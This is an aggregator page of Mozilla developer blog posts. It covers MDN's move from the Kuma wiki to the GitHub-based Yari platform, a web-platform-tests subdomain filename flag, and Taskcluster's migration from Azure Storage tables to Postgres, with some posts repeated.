Posted
over 4 years
ago
by
Chris Mills
The time has come for Kuma — the platform that powers MDN Web Docs — to evolve. For quite some time now, the MDN developer team has been planning a radical platform change, and we are ready to start sharing the details of it. The question on your
... [More]
lips might be “What does a Kuma evolve into? A KumaMaMa?”
For those of you not so into Pokémon, the question might instead be “How exactly is MDN changing, and how does it affect MDN users and contributors”?
For general users, the answer is easy — there will be very little change to how we serve the great content you use everyday to learn and do your jobs.
For contributors, the answer is a bit more complex.
The changes in a nutshell
In short, we are updating the platform to move the content from a MySQL database to being hosted in a GitHub repository (codename: Project Yari).
The main advantages of this approach are:
Less developer maintenance burden: The existing (Kuma) platform is complex and hard to maintain. Adding new features is very difficult. The update will vastly simplify the platform code — we estimate that we can remove a significant chunk of the existing codebase, meaning easier maintenance and contributions.
Better contribution workflow: We will be using GitHub’s contribution tools and features, essentially moving MDN from a Wiki model to a pull request (PR) model. This is so much better for contribution, allowing for intelligent linting, mass edits, and inclusion of MDN docs in whatever workflows you want to add it to (you can edit MDN source files directly in your favorite code editor).
Better community building: At the moment, MDN content edits are published instantly, and then reverted if they are not suitable. This is really bad for community relations. With a PR model, we can review edits and provide feedback, actually having conversations with contributors, building relationships with them, and helping them learn.
Improved front-end architecture: The existing MDN platform has a number of front-end inconsistencies and accessibility issues, which we’ve wanted to tackle for some time. The move to a new, simplified platform gives us a perfect opportunity to fix such issues.
The exact form of the platform is yet to be finalized, and we want to involve you, the community, in helping to provide ideas and test the new contribution workflow! We will have a beta version of the new platform ready for testing on November 2, and the first release will happen on December 14.
Simplified back-end platform
We are replacing the current MDN Wiki platform with a JAMStack approach, which publishes the content managed in a GitHub repo. This has a number of advantages over the existing Wiki platform, and is something we’ve been considering for a number of years.
Before we discuss our new approach, let’s review the Wiki model so we can better understand the changes we’re making.
Current MDN Wiki platform
It’s important to note that both content contributors (writers) and content viewers (readers) are served via the same architecture. That architecture has to accommodate both use cases, even though more than 99% of our traffic comprises document page requests from readers. Currently, when a document page is requested, the latest version of the document is read from our MySQL database, rendered into its final HTML form, and returned to the user via the CDN.
That document page is stored and served from the CDN’s cache for the next 5 minutes, so subsequent requests — as long as they’re within that 5-minute window — will be served directly by the CDN. That caching period of 5 minutes is kept deliberately short, mainly due to the fact that we need to accommodate the needs of the writers. If we only had to accommodate the needs of the readers, we could significantly increase the caching period and serve our document pages more quickly, while at the same time reducing the workload on our backend servers.
You’ll also notice that because MDN is a Wiki platform, we’re responsible for managing all of the content, and tasks like storing document revisions, displaying the revision history of a document, displaying differences between revisions, and so on. Currently, the MDN development team maintains a large chunk of code devoted to just these kinds of tasks.
New MDN platform
With the new JAMStack approach, the writers are served separately from the readers. The writers manage the document content via a GitHub repository and pull request model, while the readers are served document pages more quickly and efficiently via pre-rendered document pages served from S3 via a CDN (which will have a much longer caching period). The document content from our GitHub repository will be rendered and deployed to S3 on a daily basis.
You’ll notice, from the diagram above, that even with this new approach, we still have a Kubernetes cluster with Django-based services relying on a relational database. The important thing to remember is that this part of the system is no longer involved with the document content. Its scope has been dramatically reduced, and it now exists solely to provide APIs related to user accounts (e.g. login) and search.
This separation of concerns has multiple benefits, the most important three of which are as follows:
First, the document pages are served to readers in the simplest, quickest, and most efficient way possible. That’s really important, because 99% of MDN’s traffic is for readers, and worldwide performance is fundamental to the user experience.
Second, because we’re using GitHub to manage our document content, we can take advantage of the world-class functionality that GitHub has to offer as a content management system, and we no longer have to support the large body of code related to our current Wiki platform. It can simply be deleted.
Third, and maybe less obvious, is that this new approach brings more power to the platform. We can, for example, perform automated linting and testing on each content pull request, which allows us to better control quality and security.
New contribution workflow
Because MDN content is soon to be contained in a GitHub repo, the contribution workflow will change significantly. You will no longer be able to click Edit on a page, make and save a change, and have it show up nearly immediately on the page. You’ll also no longer be able to do your edits in a WYSIWYG editor.
Instead, you’ll need to use git/GitHub tooling to make changes, submit pull requests, then wait for changes to be merged, the new build to be deployed, etc. For very simple changes such as fixing typos or adding new paragraphs, this may seem like a step back — Kuma is certainly convenient for such edits, and for non-developer contributors.
However, making a simple change is arguably no more complex with Yari. You can use the GitHub UI’s edit feature to directly edit a source file and then submit a PR, meaning that you don’t have to be a git genius to contribute simple fixes.
For more complex changes, you’ll need to use the git CLI tool, or a GUI tool like GitHub Desktop, but then again git is such a ubiquitous tool in the web industry that it is safe to say that if you are interested in editing MDN, you will probably need to know git to some degree for your career or course. You could use this as a good opportunity to learn git if you don’t know it already! On top of that there is a file system structure to learn, and some new tools/commands to get used to, but nothing terribly complex.
Another possible challenge to mention is that you won’t have a WYSIWYG to instantly see what the page looks like as you add your content, and in addition you’ll be editing raw HTML, at least initially (we are talking about converting the content to markdown eventually, but that is a bit of a ways off). Again, this sounds like a step backwards, but we are providing a tool inside the repo so that you can locally build and preview the finished page to make sure it looks right before you submit your pull request.
Looking at the advantages now, consider that making MDN content available as a GitHub repo is a very powerful thing. We no longer have spam content live on the site, with us then having to revert the changes after the fact. You are also free to edit MDN content in whatever way suits you best — your favorite IDE or code editor — and you can add MDN documentation into your preferred toolchain (and write your own tools to edit your MDN editing experience). A lot of engineers have told us in the past that they’d be much happier to contribute to MDN documentation if they were able to submit pull requests, and not have to use a WYSIWYG!
We are also looking into a powerful toolset that will allow us to enhance the reviewing process, for example as part of a CI process — automatically detecting and closing spam PRs, and as mentioned earlier on, linting pages once they’ve been edited, and delivering feedback to editors.
Having MDN in a GitHub repo also offers much easier mass edits; blanket content changes have previously been very difficult.
Finally, the “time to live” should be acceptable — we are aiming to have a quick turnaround on the reviews, and the deployment process will be repeated every 24 hours. We think that your changes should be live on the site in 48 hours as a worst case scenario.
Better community building
Currently MDN is not a very lively place in terms of its community. We have a fairly active learning forum where people ask beginner coding questions and seek help with assessments, but there is not really an active place where MDN staff and volunteers get together regularly to discuss documentation needs and contributions.
Part of this is down to our contribution model. When you edit an MDN page, either your contribution is accepted and you don’t hear anything, or your contribution is reverted and you … don’t hear anything. You’ll only know either way by looking to see if your edit sticks, is counter-edited, or is reverted.
This doesn’t strike us as very friendly, and I think you’ll probably agree. When we move to a git PR model, the MDN community will be able to provide hands-on assistance in helping people to get their contributions right — offering assistance as we review their PRs (and offering automated help too, as mentioned previously) — and also thanking people for their help.
It’ll also be much easier for contributors to show how many contributions they’ve made, and we’ll be adding in-page links to allow people to file an issue on a specific page or even go straight to the source on GitHub and fix it themselves, if a problem is encountered.
In terms of finding a good place to chat about MDN content, you can join the discussion on the MDN Web Docs chat room on Matrix.
Improved front-end architecture
The old Kuma architecture has a number of front-end issues. Historically we have lacked a well-defined system that clearly describes the constraints we need to work within, and what our site features look like, and this has led to us ending up with a bloated, difficult to maintain front-end code base. Working on our current HTML and CSS is like being on a roller coaster with no guard-rails.
To be clear, this is not the fault of any one person, or any specific period in the life of the MDN project. There are many little things that have been left to fester, multiply, and rot over time.
Among the most significant problems are:
Accessibility: There are a number of accessibility problems with the existing architecture that really should be sorted out, but were difficult to get a handle on because of Kuma’s complexity.
Component inconsistency: Kuma doesn’t use a proper design system — similar items are implemented in different ways across the site, so implementing features is more difficult than it needs to be.
When we started to move forward with the back-end platform rewrite, it felt like the perfect time to again propose the idea of a design system. After many conversations leading to an acceptable compromise being reached, our design system — MDN Fiori — was born.
Front-end developer Schalk Neethling and UX designer Mustafa Al-Qinneh took a whirlwind tour through the core of MDN’s reference docs to identify components and document all the inconsistencies we are dealing with. As part of this work, we also looked for areas where we can improve the user experience, and introduce consistency through making small changes to some core underlying aspects of the overall design.
This included a defined color palette, simple, clean typography based on a well-defined type scale, consistent spacing, improved support for mobile and tablet devices, and many other small tweaks. This was never meant to be a redesign of MDN, so we had to be careful not to change too much. Instead, we played to our existing strengths and made rogue styles and markup consistent with the overall project.
Besides the visual consistency and general user experience aspects, our underlying codebase needed some serious love and attention — we decided on a complete rethink. Early on in the process it became clear that we needed a base library that was small, nimble, and minimal. Something uniquely MDN, but that could be reused wherever the core aspects of the MDN brand was needed. For this purpose we created MDN-Minimalist, a small set of core atoms that power the base styling of MDN, in a progressively enhanced manner, taking advantage of the beautiful new layout systems we have access to on the web today.
Each component that is built into Yari is styled with MDN-Minimalist, and also has its own style sheet that lives right alongside to apply further styles only when needed. This is an evolving process as we constantly rethink how to provide a great user experience while staying as close to the web platform as possible. The reason for this is two fold:
First, it means less code. It means less reinventing of the wheel. It means a faster, leaner, less bandwidth-hungry MDN for our end users.
Second, it helps address some of the accessibility issues we have begrudgingly been living with for some time, which are simply not acceptable on a modern web site. One of Mozilla’s accessibility experts, Marco Zehe, has given us a lot of input to help overcome these. We won’t fix everything in our first iteration, but our pledge to all of our users is that we will keep improving and we welcome your feedback on areas where we can improve further.
A wise person once said that the best way to ensure something is done right is to make doing the right thing the easy thing to do. As such, along with all of the work already mentioned, we are documenting our front-end codebase, design system, and pattern library in Storybook (see Storybook files inside the yari repo) with companion design work in Figma (see typography example) to ensure there is an easy, public reference for anyone who wishes to contribute to MDN from a code or design perspective. This in itself is a large project that will evolve over time. More communication about its evolution will follow.
The future of MDN localization
One important part of MDN’s content that we have talked about a lot during the planning phase is the localized content. As you probably already know, MDN offers facilities for translating the original English content and making the localizations available alongside it.
This is good in principle, but the current system has many flaws. When an English page is moved, the localizations all have to be moved separately, so pages and their localizations quite often go out of sync and get in a mess. And a bigger problem is that there is no easy way of signalling that the English version has changed to all the localizers.
General management is probably the most significant problem. You often get a wave of enthusiasm for a locale, and lots of translations done. But then after a number of months interest wanes, and no-one is left to keep the translations up to date. The localized content becomes outdated, which is often harmful to learning, becomes a maintenance time-suck, and as a result, is often considered worse than having no localizations at all.
Note that we are not saying this is true of all locales on MDN, and we are not trying to downplay the amount of work volunteers have put into creating localized content. For that, we are eternally grateful. But the fact remains that we can’t carry on like this.
We did a bunch of research, and talked to a lot of non-native-English speaking web developers about what would be useful to them. Two interesting conclusions were made:
We stand to experience a significant but manageable loss of users if we remove or reduce our localization support. 8 languages cover 90% of the accept-language headers received from MDN users (en, zh, es, ja, fr, ru, pt, de), while 14 languages cover 95% of the accept-languages. We predict that we would expect to lose at most 19% of our traffic if we dropped L10n entirely.
Machine translations are an acceptable solution in most cases, if not a perfect one. We looked at the quality of translations provided by automated solutions such as Google Translate and got some community members to compare these translations to manual translations. The machine translations were imperfect, and sometimes hard to understand, but many people commented that a non-perfect language that is up-to-date is better than a perfect language that is out-of-date. We appreciate that some languages (such as CJK languages) fare less well than others with automated translations.
So what did we decide? With the initial release of the new platform, we are planning to include all translations of all of the current documents, but in a frozen state. Translations will exist in their own mdn/translated-content repository, to which we will not accept any pull requests. The translations will be shown with a special header that says “This is an archived translation. No more edits are being accepted.” This is a temporary stage until we figure out the next step.
Note: In addition, the text of the UI components and header menu will be in English only, going forward. They will not be translated, at least not initially.
After the initial release, we want to work with you, the community, to figure out the best course of action to move forward with for translations. We would ideally rather not lose localized content on MDN, but we need to fix the technical problems of the past, manage it better, and ensure that the content stays up-to-date.
We will be planning the next phase of MDN localization with the following guiding principles:
We should never have outdated localized content on MDN.
Manually localizing all MDN content in a huge range of locales seems infeasible, so we should drop that approach.
Losing ~20% of traffic is something we should avoid, if possible.
We are making no promises about deliverables or time frames yet, but we have started to think along these lines:
Cut down the number of locales we are handling to the top 14 locales that give us 95% of our recorded accept-language headers.
Initially include non-editable Machine Learning-based automated translations of the “tier-1” MDN content pages (i.e. a set of the most important MDN content that excludes the vast long tail of articles that get no, or nearly no views). Ideally we’d like to use the existing manual translations to train the Machine Learning system, hopefully getting better results. This is likely to be the first thing we’ll work on in 2021.
Regularly update the automated translations as the English content changes, keeping them up-to-date.
Start to offer a system whereby we allow community members to improve the automated translations with manual edits. This would require the community to ensure that articles are kept up-to-date with the English versions as they are updated.
Sign up for the beta test
As we mentioned earlier, we are going to launch a beta test of the new MDN platform on November 2nd. We would love your help in testing out the new system and contribution workflow, letting us know what aspects seem good and what aspects seem painful, and suggesting improvements.
If you want to be notified when the new system is ready for testing, please let us know using this form.
Acknowledgements
I’d like to thank my colleagues Schalk Neethling, Ryan Johnson, Peter Bengtsson, Rina Tambo Jensen, Hermina Condei, Melissa Thermidor, and anyone else I’ve forgotten who helped me polish this article with bits of content, feedback, reviews, edits, and more.
The post MDN Web Docs evolves! Lowdown on the upcoming new platform appeared first on Mozilla Hacks - the Web developer blog. [Less]
|
Posted
over 4 years
ago
by
Chris Mills
Update, November 3: The Yari beta phase is now open, so we’ve removed the beta signup form from this post. If you want to participate in beta testing, you can find the details on our Yari beta launch explainer.
The time has come for Kuma — the
... [More]
platform that powers MDN Web Docs — to evolve. For quite some time now, the MDN developer team has been planning a radical platform change, and we are ready to start sharing the details of it. The question on your lips might be “What does a Kuma evolve into? A KumaMaMa?”
For those of you not so into Pokémon, the question might instead be “How exactly is MDN changing, and how does it affect MDN users and contributors”?
For general users, the answer is easy — there will be very little change to how we serve the great content you use everyday to learn and do your jobs.
For contributors, the answer is a bit more complex.
The changes in a nutshell
In short, we are updating the platform to move the content from a MySQL database to being hosted in a GitHub repository (codename: Project Yari).
The main advantages of this approach are:
Less developer maintenance burden: The existing (Kuma) platform is complex and hard to maintain. Adding new features is very difficult. The update will vastly simplify the platform code — we estimate that we can remove a significant chunk of the existing codebase, meaning easier maintenance and contributions.
Better contribution workflow: We will be using GitHub’s contribution tools and features, essentially moving MDN from a Wiki model to a pull request (PR) model. This is so much better for contribution, allowing for intelligent linting, mass edits, and inclusion of MDN docs in whatever workflows you want to add it to (you can edit MDN source files directly in your favorite code editor).
Better community building: At the moment, MDN content edits are published instantly, and then reverted if they are not suitable. This is really bad for community relations. With a PR model, we can review edits and provide feedback, actually having conversations with contributors, building relationships with them, and helping them learn.
Improved front-end architecture: The existing MDN platform has a number of front-end inconsistencies and accessibility issues, which we’ve wanted to tackle for some time. The move to a new, simplified platform gives us a perfect opportunity to fix such issues.
The exact form of the platform is yet to be finalized, and we want to involve you, the community, in helping to provide ideas and test the new contribution workflow! We will have a beta version of the new platform ready for testing on November 2, and the first release will happen on December 14.
Simplified back-end platform
We are replacing the current MDN Wiki platform with a JAMStack approach, which publishes the content managed in a GitHub repo. This has a number of advantages over the existing Wiki platform, and is something we’ve been considering for a number of years.
Before we discuss our new approach, let’s review the Wiki model so we can better understand the changes we’re making.
Current MDN Wiki platform
It’s important to note that both content contributors (writers) and content viewers (readers) are served via the same architecture. That architecture has to accommodate both use cases, even though more than 99% of our traffic comprises document page requests from readers. Currently, when a document page is requested, the latest version of the document is read from our MySQL database, rendered into its final HTML form, and returned to the user via the CDN.
That document page is stored and served from the CDN’s cache for the next 5 minutes, so subsequent requests — as long as they’re within that 5-minute window — will be served directly by the CDN. That caching period of 5 minutes is kept deliberately short, mainly due to the fact that we need to accommodate the needs of the writers. If we only had to accommodate the needs of the readers, we could significantly increase the caching period and serve our document pages more quickly, while at the same time reducing the workload on our backend servers.
You’ll also notice that because MDN is a Wiki platform, we’re responsible for managing all of the content, and tasks like storing document revisions, displaying the revision history of a document, displaying differences between revisions, and so on. Currently, the MDN development team maintains a large chunk of code devoted to just these kinds of tasks.
New MDN platform
With the new JAMStack approach, the writers are served separately from the readers. The writers manage the document content via a GitHub repository and pull request model, while the readers are served document pages more quickly and efficiently via pre-rendered document pages served from S3 via a CDN (which will have a much longer caching period). The document content from our GitHub repository will be rendered and deployed to S3 on a daily basis.
You’ll notice, from the diagram above, that even with this new approach, we still have a Kubernetes cluster with Django-based services relying on a relational database. The important thing to remember is that this part of the system is no longer involved with the document content. Its scope has been dramatically reduced, and it now exists solely to provide APIs related to user accounts (e.g. login) and search.
This separation of concerns has multiple benefits, the most important three of which are as follows:
First, the document pages are served to readers in the simplest, quickest, and most efficient way possible. That’s really important, because 99% of MDN’s traffic is for readers, and worldwide performance is fundamental to the user experience.
Second, because we’re using GitHub to manage our document content, we can take advantage of the world-class functionality that GitHub has to offer as a content management system, and we no longer have to support the large body of code related to our current Wiki platform. It can simply be deleted.
Third, and maybe less obvious, is that this new approach brings more power to the platform. We can, for example, perform automated linting and testing on each content pull request, which allows us to better control quality and security.
New contribution workflow
Because MDN content is soon to be contained in a GitHub repo, the contribution workflow will change significantly. You will no longer be able to click Edit on a page, make and save a change, and have it show up nearly immediately on the page. You’ll also no longer be able to do your edits in a WYSIWYG editor.
Instead, you’ll need to use git/GitHub tooling to make changes, submit pull requests, then wait for changes to be merged, the new build to be deployed, etc. For very simple changes such as fixing typos or adding new paragraphs, this may seem like a step back — Kuma is certainly convenient for such edits, and for non-developer contributors.
However, making a simple change is arguably no more complex with Yari. You can use the GitHub UI’s edit feature to directly edit a source file and then submit a PR, meaning that you don’t have to be a git genius to contribute simple fixes.
For more complex changes, you’ll need to use the git CLI tool, or a GUI tool like GitHub Desktop, but then again git is such a ubiquitous tool in the web industry that it is safe to say that if you are interested in editing MDN, you will probably need to know git to some degree for your career or course. You could use this as a good opportunity to learn git if you don’t know it already! On top of that there is a file system structure to learn, and some new tools/commands to get used to, but nothing terribly complex.
Another possible challenge to mention is that you won’t have a WYSIWYG to instantly see what the page looks like as you add your content, and in addition you’ll be editing raw HTML, at least initially (we are talking about converting the content to markdown eventually, but that is a bit of a ways off). Again, this sounds like a step backwards, but we are providing a tool inside the repo so that you can locally build and preview the finished page to make sure it looks right before you submit your pull request.
Looking at the advantages now, consider that making MDN content available as a GitHub repo is a very powerful thing. We no longer have spam content live on the site, with us then having to revert the changes after the fact. You are also free to edit MDN content in whatever way suits you best — your favorite IDE or code editor — and you can add MDN documentation into your preferred toolchain (and write your own tools to edit your MDN editing experience). A lot of engineers have told us in the past that they’d be much happier to contribute to MDN documentation if they were able to submit pull requests, and not have to use a WYSIWYG!
We are also looking into a powerful toolset that will allow us to enhance the reviewing process, for example as part of a CI process — automatically detecting and closing spam PRs, and as mentioned earlier on, linting pages once they’ve been edited, and delivering feedback to editors.
Having MDN in a GitHub repo also offers much easier mass edits; blanket content changes have previously been very difficult.
Finally, the “time to live” should be acceptable — we are aiming to have a quick turnaround on the reviews, and the deployment process will be repeated every 24 hours. We think that your changes should be live on the site in 48 hours as a worst case scenario.
Better community building
Currently MDN is not a very lively place in terms of its community. We have a fairly active learning forum where people ask beginner coding questions and seek help with assessments, but there is not really an active place where MDN staff and volunteers get together regularly to discuss documentation needs and contributions.
Part of this is down to our contribution model. When you edit an MDN page, either your contribution is accepted and you don’t hear anything, or your contribution is reverted and you … don’t hear anything. You’ll only know either way by looking to see if your edit sticks, is counter-edited, or is reverted.
This doesn’t strike us as very friendly, and I think you’ll probably agree. When we move to a git PR model, the MDN community will be able to provide hands-on assistance in helping people to get their contributions right — offering assistance as we review their PRs (and offering automated help too, as mentioned previously) — and also thanking people for their help.
It’ll also be much easier for contributors to show how many contributions they’ve made, and we’ll be adding in-page links to allow people to file an issue on a specific page or even go straight to the source on GitHub and fix it themselves, if a problem is encountered.
In terms of finding a good place to chat about MDN content, you can join the discussion on the MDN Web Docs chat room on Matrix.
Improved front-end architecture
The old Kuma architecture has a number of front-end issues. Historically we have lacked a well-defined system that clearly describes the constraints we need to work within, and what our site features look like, and this has led to us ending up with a bloated, difficult to maintain front-end code base. Working on our current HTML and CSS is like being on a roller coaster with no guard-rails.
To be clear, this is not the fault of any one person, or any specific period in the life of the MDN project. There are many little things that have been left to fester, multiply, and rot over time.
Among the most significant problems are:
Accessibility: There are a number of accessibility problems with the existing architecture that really should be sorted out, but were difficult to get a handle on because of Kuma’s complexity.
Component inconsistency: Kuma doesn’t use a proper design system — similar items are implemented in different ways across the site, so implementing features is more difficult than it needs to be.
When we started to move forward with the back-end platform rewrite, it felt like the perfect time to again propose the idea of a design system. After many conversations leading to an acceptable compromise being reached, our design system — MDN Fiori — was born.
Front-end developer Schalk Neethling and UX designer Mustafa Al-Qinneh took a whirlwind tour through the core of MDN’s reference docs to identify components and document all the inconsistencies we are dealing with. As part of this work, we also looked for areas where we can improve the user experience, and introduce consistency through making small changes to some core underlying aspects of the overall design.
This included a defined color palette, simple, clean typography based on a well-defined type scale, consistent spacing, improved support for mobile and tablet devices, and many other small tweaks. This was never meant to be a redesign of MDN, so we had to be careful not to change too much. Instead, we played to our existing strengths and made rogue styles and markup consistent with the overall project.
Besides the visual consistency and general user experience aspects, our underlying codebase needed some serious love and attention — we decided on a complete rethink. Early on in the process it became clear that we needed a base library that was small, nimble, and minimal. Something uniquely MDN, but that could be reused wherever the core aspects of the MDN brand was needed. For this purpose we created MDN-Minimalist, a small set of core atoms that power the base styling of MDN, in a progressively enhanced manner, taking advantage of the beautiful new layout systems we have access to on the web today.
Each component that is built into Yari is styled with MDN-Minimalist, and also has its own style sheet that lives right alongside to apply further styles only when needed. This is an evolving process as we constantly rethink how to provide a great user experience while staying as close to the web platform as possible. The reason for this is two fold:
First, it means less code. It means less reinventing of the wheel. It means a faster, leaner, less bandwidth-hungry MDN for our end users.
Second, it helps address some of the accessibility issues we have begrudgingly been living with for some time, which are simply not acceptable on a modern web site. One of Mozilla’s accessibility experts, Marco Zehe, has given us a lot of input to help overcome these. We won’t fix everything in our first iteration, but our pledge to all of our users is that we will keep improving and we welcome your feedback on areas where we can improve further.
A wise person once said that the best way to ensure something is done right is to make doing the right thing the easy thing to do. As such, along with all of the work already mentioned, we are documenting our front-end codebase, design system, and pattern library in Storybook (see Storybook files inside the yari repo) with companion design work in Figma (see typography example) to ensure there is an easy, public reference for anyone who wishes to contribute to MDN from a code or design perspective. This in itself is a large project that will evolve over time. More communication about its evolution will follow.
The future of MDN localization
One important part of MDN’s content that we have talked about a lot during the planning phase is the localized content. As you probably already know, MDN offers facilities for translating the original English content and making the localizations available alongside it.
This is good in principle, but the current system has many flaws. When an English page is moved, the localizations all have to be moved separately, so pages and their localizations quite often go out of sync and get in a mess. And a bigger problem is that there is no easy way of signalling that the English version has changed to all the localizers.
General management is probably the most significant problem. You often get a wave of enthusiasm for a locale, and lots of translations done. But then after a number of months interest wanes, and no-one is left to keep the translations up to date. The localized content becomes outdated, which is often harmful to learning, becomes a maintenance time-suck, and as a result, is often considered worse than having no localizations at all.
Note that we are not saying this is true of all locales on MDN, and we are not trying to downplay the amount of work volunteers have put into creating localized content. For that, we are eternally grateful. But the fact remains that we can’t carry on like this.
We did a bunch of research, and talked to a lot of non-native-English speaking web developers about what would be useful to them. Two interesting conclusions were made:
We stand to experience a significant but manageable loss of users if we remove or reduce our localization support. 8 languages cover 90% of the accept-language headers received from MDN users (en, zh, es, ja, fr, ru, pt, de), while 14 languages cover 95% of the accept-languages (en, zh, es, ja, fr, ru, pt, de, ko, zh-TW, pl, it, nl, tr). We predict that we would expect to lose at most 19% of our traffic if we dropped L10n entirely.
Machine translations are an acceptable solution in most cases, if not a perfect one. We looked at the quality of translations provided by automated solutions such as Google Translate and got some community members to compare these translations to manual translations. The machine translations were imperfect, and sometimes hard to understand, but many people commented that a non-perfect language that is up-to-date is better than a perfect language that is out-of-date. We appreciate that some languages (such as CJK languages) fare less well than others with automated translations.
So what did we decide? With the initial release of the new platform, we are planning to include all translations of all of the current documents, but in a frozen state. Translations will exist in their own mdn/translated-content repository, to which we will not accept any pull requests. The translations will be shown with a special header that says “This is an archived translation. No more edits are being accepted.” This is a temporary stage until we figure out the next step.
Note: In addition, the text of the UI components and header menu will be in English only, going forward. They will not be translated, at least not initially.
After the initial release, we want to work with you, the community, to figure out the best course of action to move forward with for translations. We would ideally rather not lose localized content on MDN, but we need to fix the technical problems of the past, manage it better, and ensure that the content stays up-to-date.
We will be planning the next phase of MDN localization with the following guiding principles:
We should never have outdated localized content on MDN.
Manually localizing all MDN content in a huge range of locales seems infeasible, so we should drop that approach.
Losing ~20% of traffic is something we should avoid, if possible.
We are making no promises about deliverables or time frames yet, but we have started to think along these lines:
Cut down the number of locales we are handling to the top 14 locales that give us 95% of our recorded accept-language headers.
Initially include non-editable Machine Learning-based automated translations of the “tier-1” MDN content pages (i.e. a set of the most important MDN content that excludes the vast long tail of articles that get no, or nearly no views). Ideally we’d like to use the existing manual translations to train the Machine Learning system, hopefully getting better results. This is likely to be the first thing we’ll work on in 2021.
Regularly update the automated translations as the English content changes, keeping them up-to-date.
Start to offer a system whereby we allow community members to improve the automated translations with manual edits. This would require the community to ensure that articles are kept up-to-date with the English versions as they are updated.
Acknowledgements
I’d like to thank my colleagues Schalk Neethling, Ryan Johnson, Peter Bengtsson, Rina Tambo Jensen, Hermina Condei, Melissa Thermidor, and anyone else I’ve forgotten who helped me polish this article with bits of content, feedback, reviews, edits, and more.
The post MDN Web Docs evolves! Lowdown on the upcoming new platform appeared first on Mozilla Hacks - the Web developer blog. [Less]
|
Posted
over 4 years
ago
by
Mike Taylor
I added a small feature to web-platform-tests that allows you to load a test automatically on the www subdomain by using a .www filename flag (here’s the original issue).
So like, if you ever need to load a page on a different subdomain to test some
... [More]
kind of origin-y or domainy-y thing, you can just name your test something amazing like origin-y-test.www.html and it will open the test for you at www.web-platform.test (rather than web-platform.test, or similarly, however your system or server is configured).
Now you’ll never need to embed an or call window.open() ever again (unless you actually need to do those things).
🎃 [Less]
|
Posted
over 4 years
ago
This is a deep-dive into some of the implementation details of Taskcluster.
Taskcluster is a platform for building continuous integration, continuous deployment, and software-release processes.
It’s an open source project that began life at Mozilla
... [More]
, supporting the Firefox build, test, and release systems.
The Taskcluster “services” are a collection of microservices that handle distinct tasks: the queue coordinates tasks; the worker-manager creates and manages workers to execute tasks; the auth service authenticates API requests; and so on.
Azure Storage Tables to Postgres
Until April 2020, Taskcluster stored its data in Azure Storage tables, a simple NoSQL-style service similar to AWS’s DynamoDB.
Briefly, each Azure table is a list of JSON objects with a single primary key composed of a partition key and a row key.
Lookups by primary key are fast and parallelize well, but scans of an entire table are extremely slow and subject to API rate limits.
Taskcluster was carefully designed within these constraints, but that meant that some useful operations, such as listing tasks by their task queue ID, were simply not supported.
Switching to a fully-relational datastore would enable such operations, while easing deployment of the system for organizations that do not use Azure.
Always Be Migratin’
In April, we migrated the existing deployments of Taskcluster (at that time all within Mozilla) to Postgres.
This was a “forklift migration”, in the sense that we moved the data directly into Postgres with minimal modification.
Each Azure Storage table was imported into a single Postgres table of the same name, with a fixed structure:
create table queue_tasks_entities(
partition_key text,
row_key text,
value jsonb not null,
version integer not null,
etag uuid default public.gen_random_uuid()
);
alter table queue_tasks_entities add primary key (partition_key, row_key);
The importer we used was specially tuned to accomplish this import in a reasonable amount of time (hours).
For each known deployment, we scheduled a downtime to perform this migration, after extensive performance testing on development copies.
We considered options to support a downtime-free migration.
For example, we could have built an adapter that would read from Postgres and Azure, but write to Postgres.
This adapter could support production use of the service while a background process copied data from Azure to Postgres.
This option would have been very complex, especially in supporting some of the atomicity and ordering guarantees that the Taskcluster API relies on.
Failures would likely lead to data corruption and a downtime much longer than the simpler, planned downtime.
So, we opted for the simpler, planned migration.
(we’ll revisit the idea of online migrations in part 3)
The database for Firefox CI occupied about 350GB.
The other deployments, such as the community deployment, were much smaller.
Database Interface
All access to Azure Storage tables had been via the azure-entities library, with a limited and very regular interface (hence the _entities suffix on the Postgres table name).
We wrote an implementation of the same interface, but with a Postgres backend, in taskcluster-lib-entities.
The result was that none of the code in the Taskcluster microservices changed.
Not changing code is a great way to avoid introducing new bugs!
It also limited the complexity of this change: we only had to deeply understand the semantics of azure-entities, and not the details of how the queue service handles tasks.
Stored Functions
As the taskcluster-lib-entities README indicates, access to each table is via five stored database functions:
_load - load a single row
_create - create a new row
_remove - remove a row
_modify - modify a row
_scan - return some or all rows in the table
Stored functions are functions defined in the database itself, that can be redefined within a transaction.
Part 2 will get into why we made this choice.
Optimistic Concurrency
The modify function is an interesting case.
Azure Storage has no notion of a “transaction”, so the azure-entities library uses an optimistic-concurrency approach to implement atomic updates to rows.
This uses the etag column, which changes to a new value on every update, to detect and retry concurrent modifications.
While Postgres can do much better, we replicated this behavior in taskcluster-lib-entities, again to limit the changes made and avoid introducing new bugs.
A modification looks like this in Javascript:
await task.modify(task => {
if (task.status !== 'running') {
task.status = 'running';
task.started = now();
}
});
For those not familiar with JS notation, this is calling the modify method on a task, passing a modifier function which, given a task, modifies that task.
The modify method calls the modifier and tries to write the updated row to the database, conditioned on the etag still having the value it did when the task was loaded.
If the etag does not match, modify re-loads the row to get the new etag, and tries again until it succeeds.
The effect is that updates to the row occur one-at-a-time.
This approach is “optimistic” in the sense that it assumes no conflicts, and does extra work (retrying the modification) only in the unusual case that a conflict occurs.
What’s Next?
At this point, we had fork-lifted Azure tables into Postgres and no longer require an Azure account to run Taskcluster.
However, we hadn’t yet seen any of the benefits of a relational database:
data fields were still trapped in a JSON object (in fact, some kinds of data were hidden in base64-encoded blobs)
each table still only had a single primary key, and queries by any other field would still be prohibitively slow
joins between tables would also be prohibitively slow
Part 2 of this series of articles will describe how we addressed these issues.
Then part 3 will get into the details of performing large-scale database migrations without downtime. [Less]
|
Posted
over 4 years
ago
This is a deep-dive into some of the implementation details of Taskcluster.
Taskcluster is a platform for building continuous integration, continuous deployment, and software-release processes.
It’s an open source project that began life at Mozilla
... [More]
, supporting the Firefox build, test, and release systems.
The Taskcluster “services” are a collection of microservices that handle distinct tasks: the queue coordinates tasks; the worker-manager creates and manages workers to execute tasks; the auth service authenticates API requests; and so on.
Azure Storage Tables to Postgres
Until April 2020, Taskcluster stored its data in Azure Storage tables, a simple NoSQL-style service similar to AWS’s DynamoDB.
Briefly, each Azure table is a list of JSON objects with a single primary key composed of a partition key and a row key.
Lookups by primary key are fast and parallelize well, but scans of an entire table are extremely slow and subject to API rate limits.
Taskcluster was carefully designed within these constraints, but that meant that some useful operations, such as listing tasks by their task queue ID, were simply not supported.
Switching to a fully-relational datastore would enable such operations, while easing deployment of the system for organizations that do not use Azure.
Always Be Migratin’
In April, we migrated the existing deployments of Taskcluster (at that time all within Mozilla) to Postgres.
